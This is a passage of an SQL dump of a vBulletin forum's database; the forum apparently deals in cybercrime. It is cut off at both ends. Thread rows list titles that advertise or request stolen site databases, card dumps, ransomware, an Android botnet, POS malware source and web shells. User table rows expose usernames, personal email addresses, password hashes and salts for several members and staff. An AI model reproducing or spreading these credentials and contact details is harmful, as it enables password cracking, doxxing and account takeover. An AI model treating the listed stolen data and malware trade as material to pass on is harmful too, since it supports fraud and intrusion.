2817, 2817, 1443000057, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1443000057, 1, 0, '', 1, 1, 0, 0, 0, '', NULL), (2505, 'westernunion.com', '', 3045, 3045, 1463758995, 37, 0, 1, 0, 0, 0, 'ke7hb', 387, 'ke7hb', 1463758995, 1474, 0, '', 1, 0, 0, 0, 0, '', NULL), (2327, 'w0rm.ws Jabber', '', 0, 0, 1442782936, 13, 2239, 10, 2, 0, 0, 'admin', 1, 'w0rm', 1442485139, 35, 0, '', 1, 0, 0, 0, 0, '', NULL), (2325, 'slider', '', 2793, 2793, 1442914240, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442914240, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2324, 'riss', '', 2792, 2792, 1442908839, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442908839, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2323, '500mhz', '', 2791, 2791, 1442903806, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442903806, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (2322, 'nickname', '', 2790, 2790, 1442902476, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442902476, 1, 0, '', 1, 1, 0, 0, 0, '', NULL), (2321, 'esmurf', '', 2789, 2789, 1442837150, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442837150, 2, 0, '', 1, 1, 0, 0, 0, '', NULL), (2320, 'nickname', '', 2788, 2788, 1442836800, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442836800, 0, 0, '', 1, 1, 0, 0, 0, '', NULL), (2298, 'Loladr', '', 2762, 2762, 1442751871, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442751871, 6, 0, '', 1, 1, 0, 0, 0, '', NULL), (2297, 'name', '', 2761, 2761, 1442746754, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442746754, 2, 0, '', 1, 1, 0, 0, 0, '', NULL), (2296, 'D9', '', 2760, 2760, 1442746155, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442746155, 6, 0, '', 1, 1, 0, 0, 0, '', NULL), (2295, 'deadeye', '', 2759, 2759, 1442743557, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442743557, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2280, 'bat9user', '', 2743, 2743, 1442693307, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442693307, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2279, 'bat9user', '', 2742, 2742, 1442693266, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442693266, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2278, 'maktorin', '', 2741, 2741, 1442689256, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442689256, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (2277, 'T0fe1', '', 2740, 2740, 1442685870, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442685870, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2276, 'test', '', 2739, 2739, 1442680894, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442680894, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (2275, 'Zhidyaev', '', 2738, 2738, 1442680431, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442680431, 3, 0, '', 1, 1, 0, 0, 0, '', NULL), (2274, 'Romajkee', '', 2737, 2737, 1442677174, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442677174, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2273, 'crazystik', '', 2736, 2736, 1442675073, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442675073, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2272, 'AndryOsminin', '', 2735, 2735, 1442673506, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442673506, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2269, 'nyxa', '', 2732, 2732, 1442662987, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442662987, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2268, 'citizenx', '', 2731, 2731, 1442658373, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442658373, 6, 0, '', 1, 1, 0, 0, 0, '', NULL), (2267, 'Amir aka Temur', '', 2730, 2730, 1442649812, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442649812, 6, 0, '', 1, 1, 0, 0, 0, '', NULL), (2266, 'liteh', '', 2729, 2729, 1442647827, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442647827, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2265, 'nickname', '', 2728, 2728, 1442615581, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442615581, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2264, 'nickname', '', 2727, 2727, 1442608074, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442608074, 1, 0, '', 1, 1, 0, 0, 0, '', NULL), (2263, 'koshevsky', '', 2726, 2726, 1442605962, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442605962, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2262, 'ynk', '', 2725, 2725, 1442605632, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442605632, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2261, 'nickname', '', 2724, 2724, 1442603835, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442603835, 1, 0, '', 1, 1, 0, 0, 0, '', NULL), (2260, 'Chex', '', 2723, 2723, 1442601382, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442601382, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2259, 'Chex', '', 2722, 2722, 1442600723, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442600723, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2258, 'nickname', '', 2721, 2721, 1442599899, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442599899, 1, 0, '', 1, 1, 0, 0, 0, '', NULL), (2257, 'Dasfeer', '', 2720, 2720, 1442599739, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442599739, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2256, 'Chex', '', 2719, 2719, 1442599107, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442599107, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2255, 'chip3ra', '', 2718, 2718, 1442596340, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442596340, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2254, 'Upir', '', 2717, 2717, 1442595269, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442595269, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2253, 'kjk', '', 2716, 2716, 1442594552, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442594552, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2252, 'nickname', '', 2715, 2715, 1442592266, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442592266, 2, 0, '', 1, 1, 0, 0, 0, '', NULL), (2249, 'ssdtux', '', 2712, 2712, 1442586955, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442586955, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2244, '0R1en', '', 2707, 2707, 1442584017, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442584017, 6, 0, '', 1, 1, 0, 0, 0, '', NULL), (2243, 'Sawyer', '', 2706, 2706, 1442583758, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442583758, 5, 0, '', 1, 1, 0, 0, 0, '', NULL), (2239, 'w0rm.ws Jabber', '', 2702, 3021, 1457279382, 32, 0, 1, 3, 1, 0, 'admin', 1, 'tdss', 1442485139, 841, 0, '', 1, 1, 0, 0, 0, '', NULL), (2240, '#ziga', '', 2703, 2703, 1442583324, 2, 0, 0, 0, 0, 0, 'Invite', 2, 'Invite', 1442583324, 4, 0, '', 1, 1, 0, 0, 0, '', NULL), (2504, '(REQ) GM Cryptolocker', '', 3043, 3043, 1462955681, 15, 0, 1, 0, 0, 0, 'Scrack', 308, 'Scrack', 1462955681, 30, 0, '', 1, 0, 0, 0, 0, '', NULL), (2413, 'I am good seller for eu,usa,canada dumps only .', '', 2925, 2925, 1447485371, 10, 0, 1, 0, 0, 0, 'ValidFlash', 294, 'ValidFlash', 1447485371, 29, 0, '', 1, 0, 0, 0, 0, '', NULL), (2410, '[SQLi]shopcc.ru', '', 2920, 2924, 1447373141, 10, 0, 1, 2, 0, 0, 'FoxDesierto', 287, 'FoxDesierto', 1447203548, 95, 0, '', 1, 0, 0, 0, 0, '', NULL), (2417, 'stells is ripper that i did escrow with', '', 2931, 2931, 1448155601, 13, 0, 1, 0, 0, 0, 'unixman', 309, 'unixman', 1448155601, 26, 0, '', 1, 0, 0, 0, 0, '', NULL), (2418, 'Hacking Tools resources list', '', 2932, 2932, 1448260568, 10, 0, 1, 0, 0, 0, 'dark001', 178, 'dark001', 1448260568, 26, 0, '', 1, 0, 0, 0, 0, '', NULL), (2447, 'FuckAV.ru [private]', '', 0, 0, 1403408824, 10, 1030, 10, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403408824, 128, 0, '', 1, 0, 0, 0, 0, '', NULL), (2448, 'OpenSC.ws', '', 0, 0, 1403408894, 10, 1031, 10, 0, 0, 0, 'w0rm', 1, 'w0rm', 1403408894, 95, 0, '', 1, 0, 0, 0, 0, '', NULL), (2450, 'coru.in (coru.ws)', '', 0, 0, 1420649717, 10, 1092, 10, 3, 0, 0, 'w0rm', 1, 'demonic', 1404040431, 253, 0, '', 1, 0, 0, 0, 0, '', NULL), (2451, '.blackhatworld.com', '', 0, 0, 1436321646, 10, 1145, 10, 1, 0, 0, 'w0rm', 1, 'Versus71', 1405265072, 123, 0, '', 1, 0, 0, 0, 0, '', NULL), (2452, 'proclub.ws', '', 0, 0, 1405718951, 10, 1196, 10, 0, 0, 0, 'w0rm', 1, 'w0rm', 1405718951, 125, 0, '', 1, 0, 0, 0, 0, '', NULL), (2484, 'k-vrachu.ru dumps+src', '', 2990, 2990, 1454595678, 7, 0, 1, 0, 0, 0, 'w0rm', 100, 'w0rm', 1454595678, 50, 0, '', 1, 0, 0, 0, 0, '', NULL), (2488, '(REQ)Android Botnet', '', 2996, 3006, 1456182150, 15, 0, 1, 6, 0, 0, 'Scrack', 308, 'Scrack', 1455433172, 98, 4, '', 1, 0, 0, 0, 0, '', NULL), (2507, 'db icloud', '', 3047, 3047, 1464181751, 18, 0, 1, 0, 0, 0, 'st1x0', 171, 'st1x0', 1464181751, 26, 0, '', 1, 0, 0, 0, 0, '', NULL), (2508, 'Need to buy traffic or web shell', '', 3048, 3048, 1464450174, 32, 0, 1, 0, 1, 0, 'hunter_exploitkit', 172, 'hunter_exploitkit', 1464450174, 285, 0, '', 1, 0, 0, 0, 0, '', NULL), (2509, 'D+P seller = banned!', '', 3050, 3050, 1464452024, 24, 0, 1, 0, 0, 0, 'ke7hb', 387, 'ke7hb', 1464452024, 17, 0, '', 1, 0, 0, 0, 0, '', NULL), (2494, 'Katrina POS Source', '', 3012, 3012, 1456447580, 15, 0, 1, 0, 0, 0, 'Scrack', 308, 'Scrack', 1456447580, 62, 0, '', 1, 0, 0, 0, 0, '', NULL), (2495, 'mystart.com', '', 3015, 3015, 1456538961, 7, 0, 1, 0, 0, 0, 'w0rm', 100, 'w0rm', 1456538961, 60, 0, '', 1, 0, 0, 0, 0, '', NULL), (2497, 'MATE1 database', '', 3026, 3026, 1458612896, 37, 0, 1, 0, 0, 0, 'orion', 283, 'orion', 1458612896, 7, 0, '', 0, 0, 0, 0, 0, '', NULL), (2501, 'naughtyamerica.com', '', 3037, 3037, 1460311677, 37, 0, 1, 0, 0, 0, 'orion', 283, 'orion', 1460311677, 4, 0, '', 0, 0, 0, 0, 0, '', NULL), (2503, 'zoosk.com dump', '', 3042, 3042, 1462791410, 7, 0, 1, 0, 0, 0, 'admin', 1, 'admin', 1462791410, 12, 0, '', 1, 0, 0, 0, 0, '', NULL); DROP TABLE IF EXISTS `threadrate`; CREATE TABLE `threadrate` ( `threadrateid` int(10) unsigned NOT NULL AUTO_INCREMENT, `threadid` int(10) unsigned NOT NULL DEFAULT '0', `userid` int(10) unsigned NOT NULL DEFAULT '0', `vote` smallint(6) NOT NULL DEFAULT '0', `ipaddress` char(15) NOT NULL DEFAULT '', PRIMARY KEY (`threadrateid`), KEY `threadid` (`threadid`,`userid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `threadread`; CREATE TABLE `threadread` ( `userid` int(10) unsigned NOT NULL DEFAULT '0', `threadid` int(10) unsigned NOT NULL DEFAULT '0', `readtime` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`userid`,`threadid`), KEY `readtime` (`readtime`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `threadredirect`; CREATE TABLE `threadredirect` ( `threadid` int(10) unsigned NOT NULL DEFAULT '0', `expires` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`threadid`), KEY `expires` (`expires`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `threadviews`; CREATE TABLE `threadviews` ( `threadid` int(10) unsigned NOT NULL DEFAULT '0', KEY `threadid` (`threadid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `threadviews` (`threadid`) VALUES (1021), (1026), (1057), (1074), (1092), (1232), (1336), (1819), (1834), (1840), (1861), (2400), (2410), (2418), (2494), (2507), (2507); DROP TABLE IF EXISTS `upgradelog`; CREATE TABLE `upgradelog` ( `upgradelogid` int(10) unsigned NOT NULL AUTO_INCREMENT, `script` varchar(50) NOT NULL DEFAULT '', `steptitle` varchar(250) NOT NULL DEFAULT '', `step` smallint(5) unsigned NOT NULL DEFAULT '0', `startat` int(10) unsigned NOT NULL DEFAULT '0', `perpage` smallint(5) unsigned NOT NULL DEFAULT '0', `dateline` int(10) unsigned NOT NULL DEFAULT '0', PRIMARY KEY (`upgradelogid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; DROP TABLE IF EXISTS `user`; CREATE TABLE `user` ( `userid` int(10) unsigned NOT NULL AUTO_INCREMENT, `usergroupid` smallint(5) unsigned NOT NULL DEFAULT '0', `membergroupids` char(250) NOT NULL DEFAULT '', `displaygroupid` smallint(5) unsigned NOT NULL DEFAULT '0', `username` varchar(100) NOT NULL DEFAULT '', `password` char(32) NOT NULL DEFAULT '', `passworddate` date NOT NULL DEFAULT '0000-00-00', `email` char(100) NOT NULL DEFAULT '', `styleid` smallint(5) unsigned NOT NULL DEFAULT '0', `parentemail` char(50) NOT NULL DEFAULT '', `homepage` char(100) NOT NULL DEFAULT '', `icq` char(20) NOT NULL DEFAULT '', `aim` char(20) NOT NULL DEFAULT '', `yahoo` char(32) NOT NULL DEFAULT '', `msn` char(100) NOT NULL DEFAULT '', `skype` char(32) NOT NULL DEFAULT '', `showvbcode` smallint(5) unsigned NOT NULL DEFAULT '0', `showbirthday` smallint(5) unsigned NOT NULL DEFAULT '2', `usertitle` char(250) NOT NULL DEFAULT '', `customtitle` smallint(6) NOT NULL DEFAULT '0', `joindate` int(10) unsigned NOT NULL DEFAULT '0', `daysprune` smallint(6) NOT NULL DEFAULT '0', `lastvisit` int(10) unsigned NOT NULL DEFAULT '0', `lastactivity` int(10) unsigned NOT NULL DEFAULT '0', `lastpost` int(10) unsigned NOT NULL DEFAULT '0', `lastpostid` int(10) unsigned NOT NULL DEFAULT '0', `posts` int(10) unsigned NOT NULL DEFAULT '0', `reputation` int(11) NOT NULL DEFAULT '10', `reputationlevelid` int(10) unsigned NOT NULL DEFAULT '1', `timezoneoffset` char(4) NOT NULL DEFAULT '', `pmpopup` smallint(6) NOT NULL DEFAULT '0', `avatarid` smallint(6) NOT NULL DEFAULT '0', `avatarrevision` int(10) unsigned NOT NULL DEFAULT '0', `profilepicrevision` int(10) unsigned NOT NULL DEFAULT '0', `sigpicrevision` int(10) unsigned NOT NULL DEFAULT '0', `options` int(10) unsigned NOT NULL DEFAULT '33554447', `birthday` char(10) NOT NULL DEFAULT '', `birthday_search` date NOT NULL DEFAULT '0000-00-00', `maxposts` smallint(6) NOT NULL DEFAULT '-1', `startofweek` smallint(6) NOT NULL DEFAULT '1', `ipaddress` char(15) NOT NULL DEFAULT '', `referrerid` int(10) unsigned NOT NULL DEFAULT '0', `languageid` smallint(5) unsigned NOT NULL DEFAULT '0', `emailstamp` int(10) unsigned NOT NULL DEFAULT '0', `threadedmode` smallint(5) unsigned NOT NULL DEFAULT '0', `autosubscribe` smallint(6) NOT NULL DEFAULT '-1', `pmtotal` smallint(5) unsigned NOT NULL DEFAULT '0', `pmunread` smallint(5) unsigned NOT NULL DEFAULT '0', `salt` char(30) NOT NULL DEFAULT '', `ipoints` int(10) unsigned NOT NULL DEFAULT '0', `infractions` int(10) unsigned NOT NULL DEFAULT '0', `warnings` int(10) unsigned NOT NULL DEFAULT '0', `infractiongroupids` varchar(255) NOT NULL DEFAULT '', `infractiongroupid` smallint(5) unsigned NOT NULL DEFAULT '0', `adminoptions` int(10) unsigned NOT NULL DEFAULT '0', `profilevisits` int(10) unsigned NOT NULL DEFAULT '0', `friendcount` int(10) unsigned NOT NULL DEFAULT '0', `friendreqcount` int(10) unsigned NOT NULL DEFAULT '0', `vmunreadcount` int(10) unsigned NOT NULL DEFAULT '0', `vmmoderatedcount` int(10) unsigned NOT NULL DEFAULT '0', `socgroupinvitecount` int(10) unsigned NOT NULL DEFAULT '0', `socgroupreqcount` int(10) unsigned NOT NULL DEFAULT '0', `pcunreadcount` int(10) unsigned NOT NULL DEFAULT '0', `pcmoderatedcount` int(10) unsigned NOT NULL DEFAULT '0', `gmmoderatedcount` int(10) unsigned NOT NULL DEFAULT '0', `oauth_token` varchar(255) NOT NULL, `oauth_token_secret` varchar(255) NOT NULL, PRIMARY KEY (`userid`), KEY `usergroupid` (`usergroupid`), KEY `username` (`username`), KEY `birthday` (`birthday`,`showbirthday`), KEY `birthday_search` (`birthday_search`), KEY `referrerid` (`referrerid`) ) ENGINE=InnoDB DEFAULT CHARSET=latin1; INSERT INTO `user` (`userid`, `usergroupid`, `membergroupids`, `displaygroupid`, `username`, `password`, `passworddate`, `email`, `styleid`, `parentemail`, `homepage`, `icq`, `aim`, `yahoo`, `msn`, `skype`, `showvbcode`, `showbirthday`, `usertitle`, `customtitle`, `joindate`, `daysprune`, `lastvisit`, `lastactivity`, `lastpost`, `lastpostid`, `posts`, `reputation`, `reputationlevelid`, `timezoneoffset`, `pmpopup`, `avatarid`, `avatarrevision`, `profilepicrevision`, `sigpicrevision`, `options`, `birthday`, `birthday_search`, `maxposts`, `startofweek`, `ipaddress`, `referrerid`, `languageid`, `emailstamp`, `threadedmode`, `autosubscribe`, `pmtotal`, `pmunread`, `salt`, `ipoints`, `infractions`, `warnings`, `infractiongroupids`, `infractiongroupid`, `adminoptions`, `profilevisits`, `friendcount`, `friendreqcount`, `vmunreadcount`, `vmmoderatedcount`, `socgroupinvitecount`, `socgroupreqcount`, `pcunreadcount`, `pcmoderatedcount`, `gmmoderatedcount`, `oauth_token`, `oauth_token_secret`) VALUES (1, 6, '', 0, 'admin', '70ea01fe71fcf2d6131bef3b006b2d8e', '2016-02-23', '', 0, '', '', '', '', '', '', '', 2, 2, 'Administrator', 0, 1420392420, 0, 1464867330, 1464947462, 1462791410, 0, 0, 10, 1, '0', 0, 0, 0, 0, 0, 11536471, '', '0000-00-00', -1, 1, '', 0, 0, 0, 0, -1, 5, 1, '*&2>Toi\'x{(c:k3}cOO<>N5)x*P\"bG', 0, 0, 0, '', 0, 0, 399, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (2, 2, '', 0, 'Invite', '28aa3e52103e17f2b886eb4dd157c8eb', '2014-05-25', '', 0, '', '', '', '', '', '', '', 1, 0, 'Senior Member', 0, 1401018300, -1, 1401018369, 1401018300, 1443389868, 0, 806, 30, 5, '0', 0, 0, 0, 0, 0, 45100119, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'q{kb8DNloJ5??+v/W\'+$][;~|4hL7C', 0, 0, 0, '', 0, 0, 123, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (3, 7, '', 0, 'Kingbeef', 'ab8f06c388b319233ca39c680c66f1e0', '2014-05-31', '', 0, '', '', '', '', '', '', '', 1, 0, 'Moderator', 0, 1401572820, -1, 1462900124, 1465686349, 1445878300, 2898, 4, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', 40, 1, '', 0, 0, 0, 0, -1, 1, 0, 'jswCNyf\',pqvo_Y8W[e<\"4Gl\"$[)b_', 0, 0, 0, '', 0, 0, 117, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (6, 7, '', 0, 'kx00', '1468821027284ebe0e6ff2ec5698b1a4', '2014-06-23', 'kx00ru@gmail.com', 0, '', '', '', '', '', '', '', 1, 0, 'Üþôõрðтþр', 0, 1403322300, -1, 1411834972, 1411922193, 1410796176, 2048, 18, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'Rok]{gD\":K}Wi!%mk1\\`*@%3-tXCK?', 0, 0, 0, '', 0, 0, 61, 0, 0, 1, 0, 0, 0, 0, 0, 0, '', ''), (7, 2, '', 0, 'Bo0om', '70ee4d57cfd344017c68e91ef808a004', '2015-03-27', 'i@bo0om.ru', 0, '', 'http://bo0om.ru/', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1403411880, -1, 1412005431, 1427449141, 1411008788, 2081, 8, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 6, 2, 'xu~/@RT|4%v-Og@K^!c#WA.2iRF4BZ', 0, 0, 0, '', 0, 0, 78, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (8, 2, '', 0, '090h', '58ca820c210bf4677035d9738d4d9f1d', '2014-08-16', '', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1403411940, -1, 1408228515, 1408231800, 0, 0, 0, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 1, 1, ';!6\"||j$?kZ.._nJ6V\"`JAEk({.}A|', 0, 0, 0, '', 0, 0, 41, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (9, 2, '', 0, 'null', 'c488d48fcad46582cfb46c9641f12f37', '2014-08-13', '', 0, '', '', '', '', '', '', '', 1, 0, 'Member', 0, 1403417280, -1, 1426972425, 1427522940, 1420887840, 2228, 43, 10, 5, '0', 0, 0, 0, 0, 0, 45092439, '', '0000-00-00', -1, 1, '', 0, 0, 0, 0, -1, 1, 0, 'gh[Q|9j*,|5Rt41\"^0\"1#+d%MZwm2`', 0, 0, 0, '', 0, 0, 89, 0, 0, 3, 0, 0, 0, 0, 0, 0, '', ''), (10, 2, '', 0, 'skiffha', '1eb098495d5a69974aa2fed86cceff07', '2014-06-22', 'skiffha@yandex.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1403420580, -1, 1456750665, 1456896780, 1403539020, 0, 9, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '`)\\vn^AyR,yhe,|b|DHvcBcG-O{<*I', 0, 0, 0, '', 0, 0, 67, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (11, 7, '', 0, 'Psych0tr1a', '5807d6227380aaaebebd067db1b431e0', '2016-03-16', 'w@inbox.ru', 0, '', '', '277777777', '', '', '', '', 1, 0, 'Moderator', 0, 1403471700, -1, 1475239107, 1475239107, 1445622989, 2892, 53, 10, 5, '3', 0, 0, 0, 0, 0, 45616215, '', '0000-00-00', -1, 1, '', 0, 0, 0, 0, -1, 32, 0, 'atxlsjXZD*6rQ4Oe`.D9ozgC2x^:3x', 0, 0, 0, '', 0, 0, 122, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (13, 8, '', 0, 'syslink', '76a1ae1933e3a5b9b8431dcad39db3e7', '2014-09-12', '', 0, '', '', '', '', '', '', '', 1, 0, 'Banned', 0, 1403821140, -1, 1474285078, 1474285078, 1455753840, 2999, 17, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 19, 0, 'BnjSAlJ@2||${b?X1^VC/j7aV0tD5_', 0, 0, 0, '', 0, 0, 162, 1, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (14, 2, '', 0, 'trueEv1l', '2cc5a2c09db2938b8577da630431dc15', '2014-06-27', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1403883360, -1, 1403883427, 1403883960, 0, 0, 0, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'jE9El9g6F#aEAK,6|zcO0\\3VR%!8o>', 0, 0, 0, '', 0, 0, 21, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (16, 2, '', 0, 'oaz', 'b626879e3c4c6c95b3685941a65e501d', '2014-07-02', 'oaz@mail.ru', 0, '', '', '', '', '', '', '', 1, 0, 'Junior Member', 0, 1403898900, -1, 1464045006, 1464045006, 0, 0, 0, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'ny\'-*Rw[tK2OMeJ|.`]kNC2b>nXM=#', 0, 0, 0, '', 0, 0, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (18, 2, '', 0, 'xargs', '9b35781529f1e87b00b9b410a55a1982', '2014-06-29', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1404044220, -1, 1474284288, 1474284288, 0, 0, 0, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '^vSku^d)2;`\'m}g<(d_uj]-8;ko@Eg', 0, 0, 0, '', 0, 0, 28, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (19, 2, '', 0, 'Ereee', 'a21a357dff0323e5b7faeb67dcded588', '2014-06-30', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1404145680, -1, 1406139316, 1406843280, 1406049840, 1314, 0, 10, 5, '0', 0, 0, 0, 0, 0, 45092055, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '[w*i6Gm<}!vE{awFuLNdsy{wed4Hy)', 0, 0, 0, '', 0, 0, 34, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (22, 2, '', 0, 'awert', 'ce368ee1dbb4e3565a52dbc5a4594d21', '2014-07-07', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1404753600, -1, 1411985909, 1412001065, 1411985908, 2216, 6, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 7, 0, '=nT.v!7geUSVMHG%4cJ,v\\:Q&\\ti|/', 0, 0, 0, '', 0, 0, 29, 0, 0, 1, 0, 0, 0, 0, 0, 0, '', ''), (23, 2, '', 0, 'hackdays', '4d0fca66247bba39c071e16dd4242377', '2014-07-09', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1404759720, -1, 1447963286, 1447963286, 1406087760, 1317, 1, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, 'kzQP`B}jezXCF0pJ%a!?YY)&H3~XkS', 0, 0, 0, '', 0, 0, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (24, 2, '', 0, 'opium', '90d6a2bc92d21e1662cb5e4f99435048', '2014-07-07', '', 0, '', '', '', '', '', '', '', 1, 0, 'ÃÂþòøчþú', 0, 1404760140, -1, 1464044881, 1464044881, 1408500220, 0, 1, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, ';usfYyw4U}}BnN)8X{Q-g3#_HmTGC[', 0, 0, 0, '', 0, 0, 113, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (25, 7, '', 0, 'mb1', '3b63ea1c474827f5029ffe1df82a23f6', '2014-07-10', '', 0, '', '', '', '', '', '', '', 1, 0, 'Üþôõрðтþр', 0, 1405021080, -1, 1407859800, 1407954012, 1407831660, 0, 2, 10, 5, '0', 0, 0, 0, 0, 0, 45091927, '', '0000-00-00', -1, -1, '', 0, 0, 0, 0, -1, 0, 0, '1>bN@ixb=*13a-WrBW_FvXhHnYS@aP<-}94NH#5}-rE', 0, 0, 0, '', 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 0, 0, '', ''), (38, 7, '', 0, 'systemmain', 